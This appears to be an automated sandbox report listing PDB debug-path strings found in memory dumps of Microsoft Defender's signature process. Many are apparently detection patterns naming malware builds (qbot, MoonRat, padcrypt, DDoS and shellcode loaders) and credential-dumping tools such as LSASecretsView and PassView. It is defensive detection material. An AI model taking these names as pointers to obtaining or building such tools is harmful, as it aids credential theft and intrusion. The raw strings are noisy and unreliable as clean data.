Source: Binary string: msoert2.pdb3 source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: (vbsedit_source\x64\Release\mywscript.pdb source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: csgoInjector.pdb source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: \output\MinSizeRel\updrem.pdb] source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp
Source: Binary string: vga256.pdb source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp
Source: Binary string: kernel32.pdb source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp
Source: Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdbx source: MpSigStub.exe, 0000000B.00000003.18293714147.0000021B5DFB4000.00000004.00000001.sdmp
Source: Binary string: \\WOO\\HT\\.+Server.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp
Source: Binary string: F:\downloader\download_mgr\Release\shell.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: acpi.pdbN source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: Fwizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\FancHuible.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb0 source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: stscast.pdb source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp
Source: Binary string: winscard.pdb source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp
Source: Binary string: m:\VP\QM\trunk\output\Recorder.pdb source: MpSigStub.exe, 0000000B.00000003.18266135814.0000021B5EBFB000.00000004.00000001.sdmp
Source: Binary string: bin\Release\LiveUpdateWPP.pdbxd source: MpSigStub.exe, 0000000B.00000003.18278802492.0000021B5F3FA000.00000004.00000001.sdmp
Source: Binary string: ^shell\BATLE_SOURCE\SampleService_run_shellcode_from-memory10-02-2016\Release\SampleService.pdb source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp
Source: Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: \Release\shellcode.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: \ProcExpDriver.pdb source: MpSigStub.exe, 0000000B.00000003.18313524013.0000021B5F166000.00000004.00000001.sdmp
Source: Binary string: \Current\wear.pdb source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp
Source: Binary string: PCSUQuickScan.pdb source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp
Source: Binary string: e:\caoe.PDBa source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: \yacdl\Release\yacdl.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: endpointdlp.pdb source: mpam-728dfe11.exe, 00000011.00000003.18587207189.0000027770034000.00000004.00000001.sdmp
Source: Binary string: mpengine.pdb source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp
Source: Binary string: UsoCoreWorker.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: _sa\bin\Release\ClientSAHook.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: c:\To\In\All\With\Within\Value.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: w:\work\vcprj\prj\downloader\Release\injdldr.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp
Source: Binary string: security.pdb source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb0 source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: \\MoonRat_Develop\\.+\\obj\\Release\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: \bin\Release.Minimal\officer.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdb source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: unknowndll.pdbaT source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: \InstallerMainV6_Yrrehs\Release\Main.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: adptif.pdb3 source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp
Source: Binary string: LiuLiangBao\Release\LiuLiangBao.pdb source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp
Source: Binary string: \Conduit\RnD\Client\IE\Dev\6.16\6.16.1\Release\hk64tbedrs.pdb source: MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp
Source: Binary string: .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp
Source: Binary string: nafde.pdb source: MpSigStub.exe, 0000000B.00000003.18278802492.0000021B5F3FA000.00000004.00000001.sdmp
Source: Binary string: autofmt.pdb source: MpSigStub.exe, 0000000B.00000003.18302807114.0000021B5E60C000.00000004.00000001.sdmp
Source: Binary string: PoolMonPlugin.pdb source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: TuneUpUtilitiesApp32.pdb source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: d:\pavbld\amcore\Signature\Source\sigutils\vdlls\Microsoft.NET\VFramework\mscorlib\mscorlib.pdb source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp
Source: Binary string: sfc.pdb source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp
Source: Binary string: \Projects\FlashPlayerPlugin\FlashPlayerPlugin\obj\Release\FlashPlayerPlugin.pdb source: MpSigStub.exe, 0000000B.00000003.18269858527.0000021B5F43D000.00000004.00000001.sdmp
Source: Binary string: DefenderCSP.pdbGCTL source: mpam-728dfe11.exe, 00000011.00000003.18579337168.0000027770032000.00000004.00000001.sdmp, MpSigStub.exe, 00000012.00000003.18627348155.000002DF229BA000.00000004.00000001.sdmp
Source: Binary string: AWInstaller.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: HookPasswordReset.pdb source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: padcryptUninstaller\obj\Debug\padcryptUninstaller.pdb source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp
Source: Binary string: PassView.pdb source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp
Source: Binary string: e:\mpengine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Xml\System.Xml.pdb source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp
Source: Binary string: ConfigSecurityPolicy.pdb source: mpam-728dfe11.exe, 00000011.00000003.18590234890.0000027770036000.00000004.00000001.sdmp
Source: Binary string: tdc.pdb3 source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp
Source: Binary string: msoert2.pdb source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: Tokenvator.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: I \\WOO\\HT\\AD_Attacker\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdbx source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\finger\objfre\i386\finger.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: \iSafe\trunk\bin\iSafeSvc2.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: dfsfgjfgdes.pdb source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp
Source: Binary string: nanamnana\obj\Debug\nanamnana.pdbx source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp
Source: Binary string: L6\\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: \Akl\kh\Release\kh.pdb source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp
Source: Binary string: \Release\initialexe\torch.exe.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: dsquery.pdb source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\ebclient\dmsetup\dmsched2\Release\dmsched2.pdbx source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp
Source: Binary string: -\BetterInstaller\Release\BetterInstaller.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: \\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: dxva2.pdb3 source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp
Source: Binary string: D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: subst.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: \BaseFlash.pdb source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp
Source: Binary string: schtasks.pdbd source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp
Source: Binary string: \Release\SSEngine.pdb source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lodctr\objchk\i386\lodctr.pdb source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp
Source: Binary string: Archer_Add_Packet\Release\Packet.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: \tcrypt\Release\s_low.pdbx source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp
Source: Binary string: P'Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: M(\\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdbGCTL source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: freefilesync_x64.pdb source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: P)E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp
Source: Binary string: d:\74\55\Child\Require\bank\Bear\rather\66\Boy\front\special\straight\wood\1\guide.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdb source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: cryptdll.pdb source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: reg.pdbd source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: !#HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: pid.pdb3 source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: @.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: \b\Ship\Win32\VideoProjectsLauncher\VideoProjectsLauncher.pdb source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp
Source: Binary string: HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp
Source: Binary string: vssadmin.pdb source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp
Source: Binary string: r:\rel\iMS-srvreg56.pdb source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: 50G:\\combustion\\aiding\\breaching\\stooping.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: msnetobj.pdb3 source: MpSigStub.exe, 0000000B.00000003.18306579283.0000021B5E6D2000.00000004.00000001.sdmp
Source: Binary string: lsasrv.pdb source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: llq001\src\out\Official\UpdateChecker.exe.pdb source: MpSigStub.exe, 0000000B.00000003.18304834904.0000021B5E504000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-comm-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: fA\\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: K8MiniPage.pdb source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp
Source: Binary string: PELoader.pdb source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp
Source: Binary string: Session.*\\Release\\GenIt\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: \Release\ProtectedService.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb` source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: [cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: \release\LSASecretsView.pdbx source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp
Source: Binary string: SelfMother\SeaFriend\SmallStore\save.pdb source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp
Source: Binary string: #CNC Plugins Tools\ProgFactory_d.pdb source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!\VstsGitSourceIndex.exe source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp
Source: Binary string: BrowserManager.pdbxx source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: 'D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: hal.pdb source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp
Source: Binary string: \mspass.pdb source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp
Source: Binary string: \bin\pxdl.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: flzEnlAs.pdb source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp
Source: Binary string: D:\WorkObject\SupL_EnableBHO\BHOEnabler\bin\BHOEnabler.pdb source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: WirelessKeyView.pdb source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp
Source: Binary string: i=[cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: \SSFK\Release\SSFK.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: $\SuperLight\release\MfcDllServer.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: Release\adviser.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: JJDownLoader\Bin\JJDownLoader_a.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: iashlpr.pdb source: MpSigStub.exe, 0000000B.00000003.18316500668.0000021B5EA6E000.00000004.00000001.sdmp
Source: Binary string: \tutorial\Release\CoffeeShop6.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: .C:\source\src\nssm\out\Release\win64\absrv.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: \\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp
Source: Binary string: ZAService.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: gMolq.pdb source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp
Source: Binary string: O&\\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: rafotech\minisoft\tools\xyfa\Release\xyfa.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: RamMap.pdb source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdbxm source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: c:\\Injekt - Builds\\.*\\SpeedBrowserP\\Source\\shortcut\\Encoder\\obj\\Release\\shortcut.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: aeroadmin.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: 6E:\Other\SecEdit\Sedisk\objfre_w2K_x86\i386\Sedisk.pdb~ source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: rpcss.pdb source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp
Source: Binary string: \Release\UpdaterService.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: RegCleaner\bin\Release\PCCleaningUtility.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: You\Above\Particular\Exception.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: \down\Wing\Would.pdb source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp
Source: Binary string: mafia2injector\Release\MafiaInjector.pdb source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp
Source: Binary string: \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp
Source: Binary string: \Release\TKCodeDDoS.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: CrossLoopService.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: \Release\winsrcsrv.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: MpAdlElvtStub.pdb source: mpam-728dfe11.exe, 00000011.00000002.19890272832.00007FF74001F000.00000002.00020000.sdmp
Source: Binary string: ir41_qcx.pdb source: MpSigStub.exe, 0000000B.00000003.18316500668.0000021B5EA6E000.00000004.00000001.sdmp
Source: Binary string: G\SharedSerialization\obj\Release\netstandard2.0\SharedSerialization.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: dbmsrpcn.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: termsrv.pdbaA source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: mciole32.pdb source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp
Source: Binary string: irprops.pdbj source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: \Release\NvBackend.pdbx source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp
Source: Binary string: mqutil.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: ConfigSecurityPolicy.pdbGCTL source: mpam-728dfe11.exe, 00000011.00000003.18590234890.0000027770036000.00000004.00000001.sdmp
Source: Binary string: ReleaseDebug\TvServer.pdb source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: usp10.pdbj source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp
Source: Binary string: mstscax.pdb source: MpSigStub.exe, 0000000B.00000003.18277664161.0000021B5E0C2000.00000004.00000001.sdmp
Source: Binary string: \output\MinSizeRel\updrem.pdb source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp
Source: Binary string: \Disable_Windowsupdate.pdbaG source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: \SupNewTab\bin\SupTab.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: "SimCorp.XMGRs.Testing.ApiTests.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: tixati.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: \i386\iSafeNetFilter.pdb source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp
Source: Binary string: schtasks.pdbd*Microsoft Corporation source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp
Source: Binary string: c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\winver\objfre\i386\winver.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: Amon\Current\nethfdrv\Production\netupdsrv.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: PicoTorrent.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: \AppSync.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: I \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: appmgmts.pdb source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp
Source: Binary string: \src\out\Release\cleaner.pdb source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp
Source: Binary string: \chrome-toolbox\trunk\src\plugin\apihook.pdb source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp
Source: Binary string: F:\Projects\MiniSword\MakeSword\MakeSword\obj\Debug\MakeSword.pdb source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp
Source: Binary string: \CoronaVirus Status.pdb source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp
Source: Binary string: \svr_d\server_lyl\WinSAP\winSAP_2\Release\winSAP_2.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: \Minoral.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
